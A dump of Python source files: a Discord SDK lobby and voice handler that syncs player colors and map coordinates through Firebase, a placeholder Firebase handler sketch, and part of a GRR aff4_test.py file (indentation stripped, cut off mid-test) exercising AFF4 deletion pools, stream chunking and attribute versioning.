discord_handler.py
import time
import os
import signal
import sys
import threading
import json
import math

import discordsdk as dsdk

from firebase_handler import FirebaseHandler

APP_ID = 799831774959763488


def dummy_callback(result, *args):
    if result != dsdk.Result.ok:
        raise Exception(result)


class DiscordHandler:
    def __init__(self):
        self.app = dsdk.Discord(APP_ID, dsdk.CreateFlags.default)
        self.lobby_manager = self.app.get_lobby_manager()
        self.voice_manager = self.app.get_voice_manager()
        self.user_manager = self.app.get_user_manager()

        self.lobby_id = None
        self.room_id = None
        self.user_id = None
        self.is_setup = False
        self.last_coords = (2050, 500)
        # Mapping of color -> Discord user id (as string), mirrored from Firebase.
        self.color_mapping = {}

        # Wire up Discord lobby/voice callbacks.
        self.lobby_manager.on_member_connect = self.on_member_connect
        self.lobby_manager.on_member_disconnect = self.on_member_disconnect
        self.user_manager.on_current_user_update = self.on_curr_user_update

        self.firebase = FirebaseHandler()
        signal.signal(signal.SIGINT, self.signal_handler)

    def setup(self, room_id):
        # Join the room's existing lobby if it is already registered in
        # Firebase, otherwise create a new one.
        if not self.is_setup:
            print("ROOM_ID:", room_id)
            self.is_setup = True
            if self.firebase.db.child(room_id).get().val():
                self.join_lobby(room_id)
            else:
                self.create_lobby(room_id)

    def create_lobby(self, room_id):
        print("creating lobby")
        transaction = self.lobby_manager.get_lobby_create_transaction()
        transaction.set_capacity(10)
        transaction.set_type(dsdk.enum.LobbyType.public)
        self.room_id = room_id
        self.lobby_manager.create_lobby(transaction, self.create_lobby_callback)

    def join_lobby(self, room_id):
        self.room_id = room_id
        activity_secret = self.firebase.db.child(room_id).child("activity_secret")
        activity_secret = activity_secret.get().val()
        self.lobby_manager.connect_lobby_with_activity_secret(
            activity_secret, self.connect_lobby_callback)

    def disconnect(self):
        self.lobby_manager.disconnect_voice(self.lobby_id, self.disconnect_voice_callback)

    def create_lobby_callback(self, result, lobby):
        print(result)
        if result == dsdk.Result.ok:
            self.lobby_id = lobby.id
            activity_secret = self.lobby_manager.get_lobby_activity_secret(lobby.id)
            self.firebase.db.child(self.room_id).update({"activity_secret": activity_secret})
            print(f"created lobby {lobby.id} with secret {activity_secret}")
            self.lobby_manager.connect_voice(self.lobby_id, self.connect_voice_callback)
        else:
            raise Exception(result)

    def connect_lobby_callback(self, result, lobby):
        if result == dsdk.Result.ok:
            print(f"connected to lobby {lobby.id}")
            self.lobby_id = lobby.id
            self.lobby_manager.connect_voice(lobby.id, self.connect_voice_callback)
        else:
            raise Exception(result)

    def connect_voice_callback(self, result):
        if result == dsdk.Result.ok:
            print("connected to voice!")
        else:
            raise Exception(result)

    def disconnect_voice_callback(self, result):
        if result == dsdk.Result.ok:
            self.lobby_manager.disconnect_lobby(self.lobby_id, dummy_callback)
        else:
            raise Exception(result)

    def adjust_user_volume(self, user_id, volume):
        # Set the local playback volume for another lobby member (0 mutes them).
        try:
            if user_id != self.user_id:
                self.voice_manager.set_local_volume(user_id, volume)
        except Exception as e:
            print("error adjusting volume", e)

    def on_member_connect(self, lobby_id, user_id):
        if lobby_id == self.lobby_id:
            self.adjust_user_volume(user_id, 0)
            print(f"{user_id} has joined the lobby!")

    def on_member_disconnect(self, lobby_id, user_id):
        if lobby_id == self.lobby_id:
            print(f"{user_id} has left the lobby!")

    def on_curr_user_update(self):
        user = self.user_manager.get_current_user()
        self.user_id = user.id

    def update_color_map(self, color):
        self.firebase.db.child(self.room_id).child("colors").update({color: str(self.user_id)})

    def update_map_coords(self, x, y, color):
        # Only push coordinates that are within 250 units of the last accepted
        # position, which filters out spurious jumps.
        last_x, last_y = self.last_coords
        distance = math.sqrt((x - last_x) ** 2 + (y - last_y) ** 2)
        if distance < 250:
            self.firebase.db.child(self.room_id).child("webapp").update(
                {str(self.user_id): {"x": x, "y": y, "color": color}})
            self.last_coords = (x, y)
            print(x, y)

    def signal_handler(self, signal, frame):
        self.disconnect()
        time.sleep(3)
        sys.exit(0)

    def run(self):
        thread = threading.Thread(target=self._spin, daemon=True)
        thread.start()

    def _spin(self):
        # Pump the Discord SDK callbacks at ~10 Hz and refresh the color
        # mapping from Firebase roughly once per second.
        ticker = 0
        while True:
            time.sleep(1 / 10)
            self.app.run_callbacks()
            ticker += 1
            if ticker == 10:
                path = self.firebase.db.child(self.room_id).child("colors")
                val = path.get().val()
                self.color_mapping = val if val else {}
                ticker = 0


if __name__ == "__main__":
    dh = DiscordHandler()
    # create_lobby() requires a room_id; the value below is only a placeholder.
    dh.create_lobby("example-room")
    dh.run()
    while True:
        time.sleep(1)
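The module above imports FirebaseHandler from firebase_handler, which is not included in this dump. As a reference only, here is a minimal sketch of a compatible handler, assuming a Pyrebase-style realtime database; the module layout and every config value are assumptions, not taken from the source. All DiscordHandler needs is a `db` attribute supporting `child(...).get().val()` and `child(...).update(...)`.

# firebase_handler.py -- minimal sketch, assuming the pyrebase4 package.
import pyrebase

# Placeholder project settings; a real deployment would substitute its own
# Firebase credentials (every value below is illustrative).
FIREBASE_CONFIG = {
    "apiKey": "YOUR_API_KEY",
    "authDomain": "your-project.firebaseapp.com",
    "databaseURL": "https://your-project.firebaseio.com",
    "storageBucket": "your-project.appspot.com",
}


class FirebaseHandler:
    def __init__(self, config=None):
        app = pyrebase.initialize_app(config or FIREBASE_CONFIG)
        # DiscordHandler only touches `self.firebase.db`, so exposing the
        # database reference is sufficient for the calls made above.
        self.db = app.database()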
aff4_test.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for the flow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import itertools
import os
import threading
import time
from absl import app
from future.builtins import range
from future.utils import iteritems
from future.utils import iterkeys
from future.utils import itervalues
import mock
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import flow
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.aff4_objects import collects
from grr_response_server.aff4_objects import standard as aff4_standard
from grr_response_server.data_stores import fake_data_store
# TODO(user): break the dependency cycle described in
# aff4_objects/standard.py and remove this import.
# pylint: disable=unused-import
from grr_response_server.flows.general import filesystem
# pylint: enable=unused-import
from grr.test_lib import aff4_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class ObjectWithLockProtectedAttribute(aff4.AFF4Volume):
"""Test object with a lock-protected attribute."""
class SchemaCls(aff4.AFF4Object.SchemaCls):
LOCK_PROTECTED_ATTR = aff4.Attribute(
"aff4:protected_attr",
rdfvalue.RDFString,
"SomeString",
lock_protected=True)
UNPROTECTED_ATTR = aff4.Attribute(
"aff4:unprotected_attr",
rdfvalue.RDFString,
"SomeString",
lock_protected=False)
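# ObjectWithLockProtectedAttribute is exercised further down by
# AFF4Test.testCreatingObjectWithMutationPoolExpiresTheCacheCorrectly and
# AFF4Test.testLockProtectedAttributesWorkCorrectly.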
class DeletionPoolTest(aff4_test_lib.AFF4ObjectTest):
"""Tests for DeletionPool class."""
def setUp(self):
super(DeletionPoolTest, self).setUp()
self.pool = aff4.DeletionPool(token=self.token)
def _CreateObject(self, urn, aff4_type):
with aff4.FACTORY.Create(urn, aff4_type, mode="w", token=self.token) as fd:
return fd
def testMarkForDeletionAddsObjectsToDeletionSet(self):
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a"))
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/b"))
self.assertEqual(
self.pool.urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/b")]))
def testMarkForDeletionAddsChildrenToDeletionSet(self):
self._CreateObject("aff4:/a", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/a/b", aff4.AFF4MemoryStream)
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a"))
self.assertEqual(
self.pool.urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/a/b")]))
def testMultiMarkForDeletionAddsMultipleObjectsToDeletionSet(self):
self.pool.MultiMarkForDeletion(
[rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/b")])
self.assertEqual(
self.pool.urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/b")]))
def testMultiMarkForDeletionAddsMultipleObjectsAndChildrenToDeletionSet(self):
self._CreateObject("aff4:/a", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/a/b", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/c", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/c/d", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/c/e", aff4.AFF4MemoryStream)
self.pool.MultiMarkForDeletion(
[rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/c")])
self.assertEqual(
self.pool.urns_for_deletion,
set([
rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/a/b"),
rdfvalue.RDFURN("aff4:/c"),
rdfvalue.RDFURN("aff4:/c/d"),
rdfvalue.RDFURN("aff4:/c/e")
]))
def testReturnsEmptyListOfRootsWhenNoUrnsMarked(self):
self.assertEqual(self.pool.root_urns_for_deletion, set())
def testReturnsSingleRootIfTwoUrnsInTheSameSubtreeMarkedForDeletion(self):
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a"))
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a/b"))
self.assertEqual(self.pool.root_urns_for_deletion,
set([rdfvalue.RDFURN("/a")]))
def testReturnsTwoRootsIfTwoMarkedUrnsAreFromDifferentSubtrees(self):
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a/b"))
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/b/c"))
self.assertEqual(
self.pool.root_urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a/b"),
rdfvalue.RDFURN("aff4:/b/c")]))
def testReturnsCorrectRootsForShuffledMarkForDeletionCalls(self):
urns = [
"aff4:/a/f", "aff4:/a/b", "aff4:/a/b/c", "aff4:/a/b/d", "aff4:/a/b/e"
]
for urns_permutation in itertools.permutations(urns):
pool = aff4.DeletionPool(token=self.token)
for urn in urns_permutation:
pool.MarkForDeletion(urn)
self.assertEqual(
pool.root_urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a/b"),
rdfvalue.RDFURN("aff4:/a/f")]))
def testOpenCachesObjectBasedOnUrnAndMode(self):
self._CreateObject("aff4:/obj", aff4.AFF4MemoryStream)
obj = self.pool.Open("aff4:/obj")
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4MemoryStream")
self._CreateObject("aff4:/obj", aff4.AFF4Volume)
obj = self.pool.Open("aff4:/obj")
# Check that we still get the old object from the cache.
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4MemoryStream")
# Check that request with different mode is not cached.
obj = self.pool.Open("aff4:/obj", mode="rw")
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4Volume")
def testOpenCachesObjectEvenIfRequestedAff4TypeIsWrong(self):
self._CreateObject("aff4:/obj", aff4.AFF4MemoryStream)
self.assertRaises(
IOError, self.pool.Open, "aff4:/obj", aff4_type=collects.GRRSignedBlob)
self._CreateObject("aff4:/obj", aff4.AFF4Volume)
obj = self.pool.Open("aff4:/obj")
# Check that the original object got cached and we do not make
# roundtrips to the datastore.
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4MemoryStream")
def testMultiOpenCachesObjectsBasedOnUrnAndMode(self):
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/obj2", aff4.AFF4MemoryStream)
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4MemoryStream")
self._CreateObject("aff4:/obj1", aff4.AFF4Volume)
self._CreateObject("aff4:/obj2", aff4.AFF4Volume)
# Check that this result is still cached.
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4MemoryStream")
# Check that request with different mode is not cached.
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"], mode="rw"))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4Volume")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4Volume")
def testMultiOpenCachesObjectsEvenIfRequestedAff4TypeIsWrong(self):
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/obj2", aff4.AFF4MemoryStream)
result = list(
self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"],
aff4_type=collects.GRRSignedBlob))
self.assertFalse(result)
self._CreateObject("aff4:/obj1", aff4.AFF4Volume)
self._CreateObject("aff4:/obj2", aff4.AFF4Volume)
# Check that original objects got cached despite the fact that they didn't
# match the aff4_type in the original pool request.
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4MemoryStream")
def testMultiOpenQueriesOnlyNonCachedObjects(self):
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/obj2", aff4.AFF4MemoryStream)
result = list(self.pool.MultiOpen(["aff4:/obj1"]))
self.assertLen(result, 1)
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self._CreateObject("aff4:/obj1", aff4.AFF4Volume)
self._CreateObject("aff4:/obj2", aff4.AFF4Volume)
result = dict((obj.urn.Basename(), obj)
for obj in self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
# Check that only previously uncached objects got fetched. Cached objects
# were left intact.
self.assertEqual(result["obj1"].Get(result["obj1"].Schema.TYPE),
"AFF4MemoryStream")
self.assertEqual(result["obj2"].Get(result["obj2"].Schema.TYPE),
"AFF4Volume")
def testMultiOpenDoesNotCacheNegativeResults(self):
result = list(self.pool.MultiOpen([""]))
self.assertFalse(result)
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
result = list(self.pool.MultiOpen(["aff4:/obj1"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
def testListChildrenResultsAreCached(self):
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
result = self.pool.ListChildren("aff4:/a")
self.assertListEqual(result, ["aff4:/a/b"])
self._CreateObject("aff4:/a/c", aff4.AFF4Volume)
result = self.pool.ListChildren("aff4:/a")
# Check that the result was cached and newly created item is not reflected
# in the request.
self.assertListEqual(result, ["aff4:/a/b"])
def testMultiListChildrenResultsAreCached(self):
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
def testMultiListChildrenQueriesOnlyNonCachedUrns(self):
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
self._CreateObject("aff4:/b", aff4.AFF4Volume)
self._CreateObject("aff4:/b/c", aff4.AFF4Volume)
result = self.pool.MultiListChildren(["aff4:/a"])
self.assertEqual(result, {"aff4:/a": ["aff4:/a/b"]})
self._CreateObject("aff4:/a/foo", aff4.AFF4Volume)
self._CreateObject("aff4:/b/bar", aff4.AFF4Volume)
# Check that cached children lists are not refetched.
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {
"aff4:/a": ["aff4:/a/b"],
"aff4:/b": ["aff4:/b/bar", "aff4:/b/c"]
})
def testRecursiveMultiListChildrenResultsAreCached(self):
result = self.pool.RecursiveMultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
def testRecursiveMultiListChildrenQueriesOnlyNonCachedUrns(self):
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b/c", aff4.AFF4Volume)
# This should put aff4:/a and aff4:/a/b into the cache.
# Note that aff4:/a/b/c's children were not queried and therefore not cached.
self.pool.MultiListChildren(["aff4:/a", "aff4:/a/b"])
self._CreateObject("aff4:/a/foo", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b/c/d", aff4.AFF4Volume)
# aff4:/a children were cached, so aff4:/a/foo won't be present in
# the results. On the other hand, aff4:/a/b/c/d should be in the
# results because children of aff4:/a/b/c weren't queried and cached.
result = self.pool.RecursiveMultiListChildren(["aff4:/a"])
self.assertEqual(
result, {
"aff4:/a": ["aff4:/a/b"],
"aff4:/a/b": ["aff4:/a/b/c"],
"aff4:/a/b/c": ["aff4:/a/b/c/d"],
"aff4:/a/b/c/d": []
})
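# The @mock.patch below shrinks AFF4Stream.MULTI_STREAM_CHUNK_SIZE to 10 bytes
# so that the short byte strings written in these tests span chunk boundaries
# and MultiStream can yield more than one chunk per file.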
@mock.patch.object(aff4.AFF4Stream, "MULTI_STREAM_CHUNK_SIZE", 10)
class AFF4MemoryStreamTest(aff4_test_lib.AFF4ObjectTest):
"""Tests for AFF4MemoryStream class."""
# Tests below effectively test default AFF4Stream._MultiStream implementation.
def testMultiStreamStreamsSingleFileWithSingleChunk(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"123456789")
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd]))
self.assertLen(chunks_fds, 1)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd)
def testMultiStreamStreamsSingleFileWithTwoChunks(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 2)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"abcd")
self.assertIs(chunks_fds[1][0], fd2)
def testMultiStreamStreamsTwoFilesWithTwoChunksInEach(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"*" * 10 + b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"*" * 10 + b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 4)
self.assertEqual(chunks_fds[0][1], b"*" * 10)
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"123456789")
self.assertIs(chunks_fds[1][0], fd1)
self.assertEqual(chunks_fds[2][1], b"*" * 10)
self.assertIs(chunks_fds[2][0], fd2)
self.assertEqual(chunks_fds[3][1], b"abcd")
self.assertIs(chunks_fds[3][0], fd2)
class AFF4ImageTest(aff4_test_lib.AFF4ObjectTest):
"""Tests for AFF4Image class."""
# Tests below effectively test AFF4ImageBase._MultiStream implementation.
def testMultiStreamStreamsSingleFileWithSingleChunk(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"123456789")
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd]))
self.assertLen(chunks_fds, 1)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd)
def testMultiStreamStreamsSingleFileWithTwoChunks(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 2)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"abcd")
self.assertIs(chunks_fds[1][0], fd2)
def testMultiStreamStreamsTwoFilesWithTwoChunksInEach(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 4)
self.assertEqual(chunks_fds[0][1], b"*" * 10)
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"123456789")
self.assertIs(chunks_fds[1][0], fd1)
self.assertEqual(chunks_fds[2][1], b"*" * 10)
self.assertIs(chunks_fds[2][0], fd2)
self.assertEqual(chunks_fds[3][1], b"abcd")
self.assertIs(chunks_fds[3][0], fd2)
def testMultiStreamChunkIsMissing(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000000", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
received_fd, chunk, e = list(aff4.AFF4Stream.MultiStream([fd]))[0]
self.assertIsNotNone(e)
self.assertIsNone(chunk)
self.assertEqual(received_fd, fd)
self.assertEqual(e.missing_chunks, ["aff4:/foo/0000000000"])
def testMultiStreamIgnoresTheFileIfAnyChunkIsMissingInReadAheadChunks(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000000", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
count = 0
for _, _, e in aff4.AFF4Stream.MultiStream([fd]):
if e is None:
count += 1
self.assertEqual(count, 0)
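# MULTI_STREAM_CHUNKS_READ_AHEAD is patched to 1 below so that the first chunk
# is already yielded before the missing last chunk is discovered; this is what
# makes truncation (rather than skipping the whole file) observable.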
@mock.patch.object(aff4.AFF4Image, "MULTI_STREAM_CHUNKS_READ_AHEAD", 1)
def testMultiStreamTruncatesBigFileIfLastChunkIsMissing(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000001", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
content = []
got_exception = False
for fd, chunk, e in aff4.AFF4Stream.MultiStream([fd]):
if e is None:
content.append(chunk)
else:
got_exception = True
self.assertEqual(content, [b"*" * 10])
self.assertTrue(got_exception)
@mock.patch.object(aff4.AFF4Image, "MULTI_STREAM_CHUNKS_READ_AHEAD", 1)
def testMultiStreamSkipsBigFileIfFirstChunkIsMissing(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000000", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
count = 0
for _, _, e in aff4.AFF4Stream.MultiStream([fd]):
if e is None:
count += 1
self.assertEqual(count, 0)
@mock.patch.object(aff4.AFF4Stream, "MULTI_STREAM_CHUNK_SIZE", 10)
class AFF4StreamTest(aff4_test_lib.AFF4ObjectTest):
def testMultiStreamStreamsObjectsOfVariousTypes(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"*" * 10 + b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 4)
# We don't know the order in advance, because files are grouped by type and
# the order of those groups is arbitrary (although the order of files within
# each group matches the order of the list passed to the MultiStream call).
if chunks_fds[0][0] == fd2:
chunks_fds = chunks_fds[2:] + chunks_fds[:2]
self.assertEqual(chunks_fds[0][1], b"*" * 10)
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"123456789")
self.assertIs(chunks_fds[1][0], fd1)
self.assertEqual(chunks_fds[2][1], b"*" * 10)
self.assertIs(chunks_fds[2][0], fd2)
self.assertEqual(chunks_fds[3][1], b"abcd")
self.assertIs(chunks_fds[3][0], fd2)
class AFF4Test(aff4_test_lib.AFF4ObjectTest):
"""Test the AFF4 abstraction."""
def testCreatingObjectWithMutationPoolExpiresTheCacheCorrectly(self):
urn = rdfvalue.RDFURN("aff4:/foo/bar")
# Create a child below the urn, so that the urn gets initialized
# as an AFF4Volume and a corresponding index entry is written.
with aff4.FACTORY.Create(
urn.Add("child"), aff4_type=aff4.AFF4Volume, token=self.token) as _:
pass
mutation_pool = data_store.DB.GetMutationPool()
with mutation_pool:
with aff4.FACTORY.Create(
urn,
mutation_pool=mutation_pool,
aff4_type=ObjectWithLockProtectedAttribute,
token=self.token) as _:
pass
# As the write operation sits in the pool, we should get an empty
# object (i.e. an AFF4Volume) here. This object will be cached by
# the AFF4 cache.
obj = aff4.FACTORY.Open(urn, token=self.token)
self.assertEqual(obj.__class__, aff4.AFF4Volume)
# Even though the object's AFF4 entry should be expired when the
# new version is written, the code doesn't take the mutation pool into
# account, so the expiry operation happens before we actually write
# the data into the datastore. That's why the AFF4 cache doesn't
# get invalidated correctly and we get stuck with the AFF4Volume object
# type in the cache.
obj = aff4.FACTORY.Open(urn, token=self.token)
# TODO(user): The check below doesn't pass. This is a bad bug, we
# should either get rid of AFF4 cache, or make it work nicely with
# mutation pools.
# self.assertEqual(obj.__class__, ObjectWithLockProtectedAttribute)
def testNonVersionedAttribute(self):
"""Test that non versioned attributes work."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
# We update the client hostname twice - Since hostname is versioned we
# expect two versions of this object.
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
client_fd = aff4.FACTORY.Open(
self.client_id, age=aff4.ALL_TIMES, token=self.token)
# Versions are represented by the TYPE attribute.
versions = list(client_fd.GetValuesForAttribute(client_fd.Schema.TYPE))
self.assertLen(versions, 2)
# Now update the CLOCK attribute twice. Since CLOCK is not versioned, this
# should not add newer versions to this object.
client.Set(client.Schema.CLOCK())
client.Flush()
client.Set(client.Schema.CLOCK())
client.Flush()
client_fd = aff4.FACTORY.Open(
self.client_id, age=aff4.ALL_TIMES, token=self.token)
# Versions are represented by the TYPE attribute.
new_versions = list(client_fd.GetValuesForAttribute(client_fd.Schema.TYPE))
self.assertEqual(versions, new_versions)
# There should also only be one clock attribute
clocks = list(client_fd.GetValuesForAttribute(client_fd.Schema.CLOCK))
self.assertLen(clocks, 1)
self.assertEqual(clocks[0].age, 0)
fd = aff4.FACTORY.Create("aff4:/foobar", aff4.AFF4Image, token=self.token)
fd.Set(fd.Schema._CHUNKSIZE(1))
fd.Set(fd.Schema._CHUNKSIZE(200))
fd.Set(fd.Schema._CHUNKSIZE(30))
fd.Flush()
fd = aff4.FACTORY.Open("aff4:/foobar", mode="rw", token=self.token)
self.assertEqual(fd.Get(fd.Schema._CHUNKSIZE), 30)
def testGetVersions(self):
"""Test we can retrieve versions."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
# Update the hostname twice, expect two versions of this object.
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
client.Set(client.Schema.HOSTNAME("client2"))
